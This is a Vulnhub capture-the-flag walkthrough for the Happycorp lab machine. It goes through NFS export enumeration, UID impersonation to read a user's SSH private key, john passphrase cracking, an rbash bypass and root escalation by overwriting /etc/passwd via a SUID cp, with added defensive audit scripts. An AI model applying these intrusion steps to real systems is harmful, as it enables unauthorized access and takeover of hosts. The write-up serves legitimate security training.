Vulnhub: Happycorp target machine walkthrough
阿新 • Published: 2022-12-04
Happycorp
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.128.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:9e:c2 1 60 PCS Systemtechnik GmbH
192.168.56.253 08:00:27:8f:f5:17 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.253.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 23:25 EST
Nmap scan report for localhost (192.168.56.253)
Host is up (0.000079s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 81:ea:90:61:be:0a:f2:8d:c3:4e:41:03:f0:07:8b:93 (RSA)
| 256 f6:07:4a:7e:1d:d8:cf:a7:cc:fd:fb:b3:18:ce:b3:af (ECDSA)
|_ 256 64:9a:52:7b:75:b7:92:0d:4b:78:71:26:65:37:6c:bd (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/admin.php
|_http-title: Happycorp
|_http-server-header: Apache/2.4.25 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 37884/udp mountd
| 100005 1,2,3 40573/udp6 mountd
| 100005 1,2,3 41755/tcp6 mountd
| 100005 1,2,3 55611/tcp mountd
| 100021 1,3,4 33478/udp6 nlockmgr
| 100021 1,3,4 38352/udp nlockmgr
| 100021 1,3,4 44527/tcp nlockmgr
| 100021 1,3,4 45537/tcp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
35799/tcp open mountd 1-3 (RPC #100005)
44527/tcp open nlockmgr 1-4 (RPC #100021)
54587/tcp open mountd 1-3 (RPC #100005)
55611/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:8F:F5:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.02 seconds
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ curl http://192.168.56.253/robots.txt
User-agent: *
Disallow: /admin.php
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ curl http://192.168.56.253/admin.php
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<center><br />
<h2>Happycorp Super Secure login</h2>
<br />
<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- That computer thingy about db and such doesn't work so I just hard coded it - Rodney -->
</form></div>
</center>
Visiting the admin.php page, a comment in the returned page hints that the site does not use a database, and that the username may be Rodney.
Let's see whether rodney's password can be brute-forced:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ nikto -h http://192.168.56.253
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.253
+ Target Hostname: 192.168.56.253
+ Target Port: 80
+ Start Time: 2022-12-03 23:34:31 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/admin.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Server may leak inodes via ETags, header found with file /, inode: 8825, size: 58340bcff7e6c, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-12-03 23:35:19 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nothing useful on port 80 for now; from the NMAP scan results we know the target host runs an NFS service:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ sudo showmount -e 192.168.56.253
Export list for 192.168.56.253:
/home/karl *
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ mkdir share
The target host exports a shared directory, so mount it locally:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ ls -alh
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar 5 2019 .bashrc
-rw------- 1 1001 1001 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 1001 1001 675 Mar 4 2019 .profile
drwx------ 2 1001 1001 4.0K Mar 5 2019 .ssh
The .ssh directory is accessible only to user and group 1001, so by creating a local user with UID 1001 we can read the files and copy the private key; id_rsa.pub also shows that the username is karl.
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ su 1001
Password:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ sudo passwd 1001
New password:
Retype new password:
passwd: password updated successfully
┌──(kali㉿kali)-[~/Vulnhub/Happycorp/share]
└─$ su 1001
Password:
$ ls
$ cd /home/kali
$ ls -alh
total 26M
drwxr-xr-x 28 kali kali 4.0K Dec 3 23:40 .
drwxr-xr-x 3 root root 4.0K Aug 8 06:10 ..
drwxr-xr-x 9 kali kali 4.0K Nov 25 21:14 antSword-master
-rw-r--r-- 1 kali kali 26M Nov 25 21:13 antSword-master.zip
-rw------- 1 kali kali 204 Nov 25 06:26 .bash_history
-rw-r--r-- 1 kali kali 220 Aug 8 06:10 .bash_logout
-rw-r--r-- 1 kali kali 5.5K Aug 8 06:10 .bashrc
-rw-r--r-- 1 kali kali 3.5K Aug 8 06:10 .bashrc.original
drwx------ 4 kali kali 4.0K Nov 22 21:39 .BurpSuite
drwx------ 13 kali kali 4.0K Dec 1 20:12 .cache
drwxr-xr-x 16 kali kali 4.0K Nov 27 06:40 .config
drwxr-xr-x 2 kali kali 4.0K Nov 21 21:22 Desktop
-rw-r--r-- 1 kali kali 35 Nov 21 20:14 .dmrc
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Documents
drwxr-xr-x 2 kali kali 4.0K Dec 3 21:33 Downloads
-rw-r--r-- 1 kali kali 12K Aug 8 06:10 .face
lrwxrwxrwx 1 kali kali 5 Aug 8 06:10 .face.icon -> .face
-rw-r--r-- 1 kali kali 22 Nov 30 18:01 .gdbinit
drwx------ 3 kali kali 4.0K Nov 21 20:14 .gnupg
-rw------- 1 kali kali 0 Nov 21 20:14 .ICEauthority
-rwxr-xr-x 1 kali kali 2.0K Nov 24 02:58 ICMS
drwxr-xr-x 4 kali kali 4.0K Nov 22 04:47 .java
drwx------ 2 kali kali 4.0K Nov 30 12:48 .john
-rw------- 1 kali kali 20 Dec 2 23:04 .lesshst
drwx------ 5 kali kali 4.0K Dec 1 20:12 .local
drwx------ 5 kali kali 4.0K Nov 21 20:43 .mozilla
drwxr-xr-x 10 kali kali 4.0K Nov 26 03:46 .msf4
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Music
drwxr-xr-x 4 kali kali 4.0K Nov 30 18:00 peda
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Pictures
drwx------ 3 kali kali 4.0K Nov 25 21:13 .pki
-rw-r--r-- 1 kali kali 807 Aug 8 06:10 .profile
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Public
-rw------- 1 kali kali 1.4K Nov 22 21:21 .python_history
drwx------ 2 kali kali 4.0K Dec 3 09:39 .ssh
-rw-r--r-- 1 kali kali 0 Nov 21 20:24 .sudo_as_admin_successful
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Templates
drwxr-xr-x 5 kali kali 4.0K Nov 29 07:10 Toolsets
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-clipboard.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-display-svga-x11.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-draganddrop.pid
-rw-r----- 1 kali kali 4 Dec 3 23:18 .vboxclient-seamless.pid
drwxr-xr-x 2 kali kali 4.0K Nov 21 20:14 Videos
-rw------- 1 kali kali 17K Dec 3 08:45 .viminfo
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 Vulnhub
drwxr-xr-x 2 kali kali 4.0K Nov 25 20:43 .weevely
-rw-r--r-- 1 kali kali 224 Nov 30 22:38 .wget-hsts
drwxr-xr-x 3 kali kali 4.0K Nov 25 10:18 .wpscan
-rw------- 1 kali kali 49 Dec 3 23:18 .Xauthority
-rw------- 1 kali kali 11K Dec 3 23:48 .xsession-errors
-rw------- 1 kali kali 8.1K Dec 3 23:04 .xsession-errors.old
drwxr-xr-x 21 kali kali 4.0K Nov 25 22:48 .ZAP
-rw------- 1 kali kali 76K Dec 3 23:04 .zsh_history
-rw-r--r-- 1 kali kali 11K Aug 8 06:10 .zshrc
$ cd Vulnhub
$ ls -alh
total 192K
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 .
drwxr-xr-x 28 kali kali 4.0K Dec 3 23:40 ..
drwxr-xr-x 2 kali kali 4.0K Nov 30 20:05 42Challenge
drwxr-xr-x 2 kali kali 4.0K Dec 1 06:48 Aqua
drwxr-xr-x 2 kali kali 4.0K Nov 30 08:33 Backdoored
drwxr-xr-x 2 kali kali 4.0K Nov 30 22:38 Beezlebub
drwxr-xr-x 2 kali kali 4.0K Dec 1 08:55 bossplayersCTF
drwxr-xr-x 2 kali kali 4.0K Dec 2 08:15 Bottleneck
drwxr-xr-x 2 kali kali 4.0K Dec 1 03:31 Darkhole
drwxr-xr-x 7 kali kali 4.0K Dec 2 23:42 Darkhole2
drwxr-xr-x 2 kali kali 4.0K Dec 3 22:11 Dawn
drwxr-xr-x 2 kali kali 4.0K Dec 3 22:49 DC_1
drwxr-xr-x 2 kali kali 4.0K Dec 3 08:45 DC416_Galahad
drwxr-xr-x 2 kali kali 4.0K Dec 3 09:41 Dr4g0n_b4ll-disk1
drwxr-xr-x 2 kali kali 4.0K Nov 21 22:01 Gigachad
drwxr-xr-x 2 kali kali 4.0K Nov 22 00:19 Hackable_II
drwxr-xr-x 2 kali kali 4.0K Nov 22 02:57 Hackathon2
drwxr-xr-x 2 kali kali 4.0K Nov 22 04:48 Hacker_Kid
drwxr-xr-x 3 kali kali 4.0K Nov 23 05:49 Hacksudo3
drwxr-xr-x 2 kali kali 4.0K Nov 23 07:51 Hacksudo_Alien
drwxr-xr-x 3 kali kali 4.0K Nov 23 00:29 Hacksudo_FOG
drwxr-xr-x 2 kali kali 4.0K Nov 23 08:58 Hacksudo_LPE
drwxr-xr-x 2 kali kali 4.0K Nov 23 00:05 Hacksudo_ProximaCentaur
drwxr-xr-x 2 kali kali 4.0K Nov 23 03:40 Hacksudo_Search
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 Happycorp
drwxr-xr-x 2 kali kali 4.0K Nov 24 04:48 ICMP
drwxr-xr-x 3 kali kali 4.0K Nov 24 08:43 Inferno
drwxr-xr-x 2 kali kali 4.0K Dec 1 04:44 InfoSecWarriorBox2
drwxr-xr-x 2 kali kali 4.0K Nov 25 02:32 Ino
drwxr-xr-x 2 kali kali 4.0K Nov 25 05:53 Insomnia
drwxr-xr-x 2 kali kali 4.0K Nov 25 21:51 jangow
drwxr-xr-x 3 kali kali 4.0K Nov 25 23:20 KB_Vuln
drwxr-xr-x 3 kali kali 4.0K Nov 26 03:01 KB_Vuln2
drwxr-xr-x 2 kali kali 4.0K Nov 26 06:57 KiraCTF
drwxr-xr-x 2 kali kali 4.0K Nov 26 10:05 Loly
drwxr-xr-x 2 kali kali 4.0K Nov 26 22:19 M87
drwxr-xr-x 3 kali kali 4.0K Nov 27 00:31 Mercury
drwxr-xr-x 2 kali kali 4.0K Nov 27 07:02 MoneyBox
drwxr-xr-x 2 kali kali 4.0K Nov 27 09:32 Monitoring
drwxr-xr-x 2 kali kali 4.0K Nov 27 21:20 Nully
drwxr-xr-x 2 kali kali 4.0K Nov 27 22:49 Odin
drwxr-xr-x 2 kali kali 4.0K Nov 28 01:21 Phineas
drwxr-xr-x 2 kali kali 4.0K Nov 28 03:07 potato-suncsr
drwxr-xr-x 2 kali kali 4.0K Nov 28 04:51 Praying
drwxr-xr-x 2 kali kali 4.0K Nov 28 06:40 Pwn_the_Tron
drwxr-xr-x 2 kali kali 4.0K Nov 28 09:47 Ragnar_lothbrok
drwxr-xr-x 2 kali kali 4.0K Nov 29 07:10 Shuriken_1
drwxr-xr-x 2 kali kali 4.0K Nov 29 09:22 Tender
$ cd Happycorp
$ ls -alh
total 16K
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 .
drwxr-xr-x 48 kali kali 4.0K Dec 3 23:19 ..
-rw-r--r-- 1 root root 2.2K Dec 3 23:26 nmap_full_scan
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 share
$ cd share
$ ls -alh
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 kali kali 4.0K Dec 3 23:50 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar 5 2019 .bashrc
-rw------- 1 1001 1001 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 1001 1001 675 Mar 4 2019 .profile
drwx------ 2 1001 1001 4.0K Mar 5 2019 .ssh
$ cd .ssh
$ ls -alh
total 24K
drwx------ 2 1001 1001 4.0K Mar 5 2019 .
drwxr-xr-x 3 1001 1001 4.0K Mar 5 2019 ..
-rw-r--r-- 1 1001 1001 740 Mar 4 2019 authorized_keys
-rw------- 1 1001 1001 3.3K Mar 4 2019 id_rsa
-rw-r--r-- 1 1001 1001 740 Mar 4 2019 id_rsa.pub
-rw-r--r-- 1 1001 1001 18 Mar 4 2019 user.txt
$ cat user.txt
flag1{Z29vZGJveQ}
$ chmod 400 id_rsa
chmod: changing permissions of 'id_rsa': Read-only file system
$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C
...
-----END RSA PRIVATE KEY-----
$ ls
authorized_keys id_rsa id_rsa.pub user.txt
$ cat id_rsa.pub
ssh-rsa ... karl@happycorp
$
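The export that made this possible is `/home/karl *`: a home directory exported to every client with plain AUTH_SYS, so the server believes whatever UID the client presents. Below is an added audit (my own code, not part of the original walkthrough) that parses an /etc/exports file and flags exactly those conditions; the sample file is constructed, with its first line modelled on the showmount output above.

```python
import re

# Constructed sample /etc/exports (not copied from the box). The first entry
# mirrors what showmount reported above: /home/karl exported to every client.
SAMPLE_EXPORTS = """\
# /etc/exports
/home/karl *(rw,sync)
/srv/backup 10.0.0.0/24(ro,sync,all_squash,sec=krb5p)
/srv/data *(ro,sync,no_root_squash)
"""

# path, client, optional "(opt,opt)"; one client per line is assumed here.
ENTRY_RE = re.compile(r"^(\S+)\s+(\S+?)(?:\((.*?)\))?$")

def parse_exports(text):
    """Yield (path, client, options) for each export line, ignoring comments."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = ENTRY_RE.match(line) if line else None
        if m:
            path, client, opts = m.groups()
            yield path, client, set((opts or "").split(",")) - {""}

def audit_export(path, client, opts):
    """Return the findings for one export; an empty list means nothing flagged."""
    findings = []
    if client == "*":
        findings.append("exported to every host (client '*')")
    if path.startswith("/home/"):
        findings.append("home directory exported: ~/.ssh and dotfiles are readable")
    # Without sec=krb5* the export uses AUTH_SYS, so the server trusts the UID
    # the client claims; anyone who can mount it just creates that UID locally.
    if not any(o.startswith("sec=krb5") for o in opts):
        findings.append("AUTH_SYS only: client-supplied UIDs are trusted")
    if "no_root_squash" in opts:
        findings.append("no_root_squash: remote root is root on the export")
    elif "all_squash" not in opts:
        findings.append("no all_squash: per-UID file access is possible")
    return findings

def audit_exports(text):
    """Map 'path client' to its findings for every export in the file."""
    return {f"{p} {c}": audit_export(p, c, o) for p, c, o in parse_exports(text)}

if __name__ == "__main__":
    for export, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(export, "->", "; ".join(findings) or "ok")
```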
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ > ...
> -----END RSA PRIVATE KEY-----' > id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ls
id_rsa nmap_full_scan share
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa karl@192.168.56.253
The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
ED25519 key fingerprint is SHA256:OgzwYRlM7h5bXbWancj8dQk7eP1k25uSijalWsnKWVQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
The private key turns out to be passphrase-protected:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh2john id_rsa > hashes
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ls
hashes id_rsa nmap_full_scan share
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep (id_rsa)
1g 0:00:00:00 DONE (2022-12-04 00:02) 33.33g/s 538666p/s 538666c/s 538666C/s sweetstuff..raymon
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The cracked passphrase for the private key is sheep.
Login succeeds, but the shell keeps reporting resource temporarily unavailable:
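john gets through rockyou at over 500k candidates per second because this key is in the legacy PEM format: "Proc-Type: 4,ENCRYPTED" with a DEK-Info line means the passphrase is stretched with a single MD5 pass (john's "Cost 1 ... is 0" and "iteration count ... is 1"), whereas the openssh-key-v1 format uses bcrypt with a configurable round count. The following added check (my code, not from the walkthrough) classifies a key by format and KDF; the legacy sample reuses the header lines shown above with the key body omitted, and the openssh-key-v1 stub is constructed by a helper, not a real key.

```python
import base64
import struct

# Constructed sample with the same headers as the id_rsa found on the share;
# the base64 key body is omitted because only the headers matter here.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A6E2D064459881EDB840A03CF87FC98C

...
-----END RSA PRIVATE KEY-----"""

def _ssh_string(blob, off):
    """Read one SSH wire-format string (uint32 length + bytes) at offset."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def build_openssh_stub(kdf="bcrypt", rounds=16, cipher=b"aes256-ctr"):
    """Constructed openssh-key-v1 header with no key material, for testing."""
    s = lambda b: struct.pack(">I", len(b)) + b
    kdfopts = s(b"\0" * 16) + struct.pack(">I", rounds) if kdf == "bcrypt" else b""
    blob = b"openssh-key-v1\0" + s(cipher) + s(kdf.encode()) + s(kdfopts)
    body = base64.b64encode(blob + struct.pack(">I", 1)).decode()  # nkeys = 1
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----"

def classify_private_key(pem):
    """Report the format, cipher, KDF and round count protecting a PEM key."""
    lines = pem.strip().splitlines()
    if "OPENSSH PRIVATE KEY" in lines[0]:
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\0"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _ssh_string(blob, len(magic))
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            (salt_len,) = struct.unpack(">I", kdfopts[:4])
            (rounds,) = struct.unpack(">I", kdfopts[4 + salt_len:8 + salt_len])
        # ssh-keygen's default is 16 bcrypt rounds; fewer, or no KDF, is weak.
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds,
                "weak": kdf != b"bcrypt" or rounds < 16}
    # Legacy PEM: "Proc-Type: 4,ENCRYPTED" plus DEK-Info means the key was
    # derived from the passphrase with one MD5 pass, so guessing is cheap.
    encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
    dek = next((l.split(":", 1)[1].strip() for l in lines
                if l.startswith("DEK-Info:")), "")
    return {"format": "legacy-pem", "cipher": dek.split(",")[0] or "none",
            "kdf": "md5" if encrypted else "none",
            "rounds": 1 if encrypted else 0, "weak": True}
```

An unencrypted legacy key is reported as weak too, since it offers no protection at all once the file is readable, as it was on this export.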
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa karl@192.168.56.253
Enter passphrase for key 'id_rsa':
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 5 05:10:07 2019 from 192.168.207.129
rbash: warning: shell level (1000) too high, resetting to 1
id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$ ^C
karl@happycorp:~$ id
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
^Crbash: fork: Interrupted system call
Specify a shell explicitly and reconnect:
┌──(kali㉿kali)-[~/Vulnhub/Happycorp]
└─$ ssh -i id_rsa karl@192.168.56.253 -t '/bin/sh'
Enter passphrase for key 'id_rsa':
$ id
uid=1001(karl) gid=1001(karl) groups=1001(karl)
$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/sbin/mount.nfs
/bin/mount
/bin/ping
/bin/cp
/bin/umount
/bin/su
$
The SUID bit on the cp command can be leveraged:
$ cp /etc/passwd /home/karl
$ cd /home/karl
$ ls -alh
total 32K
drwxr-xr-x 3 karl karl 4.0K Dec 4 08:18 .
drwxr-xr-x 3 root root 4.0K Mar 4 2019 ..
lrwxrwxrwx 1 root root 9 Mar 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 karl karl 220 Mar 4 2019 .bash_logout
-rw-r--r-- 1 karl karl 3.5K Mar 5 2019 .bashrc
-rw------- 1 karl karl 28 Mar 4 2019 .lesshst
-rw-r--r-- 1 root karl 1.4K Dec 4 08:18 passwd
-rw-r--r-- 1 karl karl 675 Mar 4 2019 .profile
drwx------ 2 karl karl 4.0K Mar 5 2019 .ssh
$
There is no need to use cp itself to escalate; it is enough to download the passwd file locally, remove root's password, then upload the file and overwrite the original.
$ su - root
root@happycorp:~# cd /root
root@happycorp:~# ls
root.txt
root@happycorp:~# cat root.txt
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
[ASCII art omitted]
-Zayotic
root@happycorp:~#
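Two conditions were chained to reach root: a SUID bit on /bin/cp, which a stock install does not set, and an /etc/passwd entry for root whose password field is empty, which is exactly what `su - root` accepted without a prompt. The added audit below (my code, not part of the walkthrough) covers both: it diffs a SUID inventory against a baseline and parses /etc/passwd for empty password fields, hashes kept outside /etc/shadow and extra UID 0 accounts. The baseline is the `find` output above minus /bin/cp and is assumed to match a stock Debian 9 host; the passwd excerpt is constructed.

```python
# SUID binaries expected on a stock Debian 9 host (assumption: derived from the
# find output above with /bin/cp removed; build yours from a clean image).
SUID_BASELINE = frozenset("""
/usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/passwd /usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign /sbin/mount.nfs /bin/mount /bin/ping /bin/umount
/bin/su
""".split())

# Output of `find / -perm -4000 -type f` on the target, as listed above.
SUID_FOUND = """
/usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/passwd /usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign /sbin/mount.nfs /bin/mount /bin/ping /bin/cp
/bin/umount /bin/su
"""

def unexpected_suid(found_text, baseline=SUID_BASELINE):
    """Return SUID paths present in the inventory but absent from the baseline."""
    return sorted(set(found_text.split()) - baseline)

# Constructed /etc/passwd excerpt: root's password field has been blanked, as
# the walkthrough does, and "toor" is a second UID 0 account for illustration.
PASSWD_SAMPLE = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0::/root:/bin/bash
karl:x:1001:1001::/home/karl:/bin/rbash
"""

def passwd_findings(passwd_text):
    """Flag accounts that log in without a password or that share UID 0."""
    findings = []
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a fuller audit would report it
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if pw == "":
            findings.append((lineno, name, "empty password field: no password needed"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((lineno, name, "hash stored in passwd instead of shadow"))
        if uid == 0 and name != "root":
            findings.append((lineno, name, "extra UID 0 account"))
    return findings

if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SUID_FOUND))
    for lineno, name, why in passwd_findings(PASSWD_SAMPLE):
        print(f"/etc/passwd:{lineno} {name}: {why}")
```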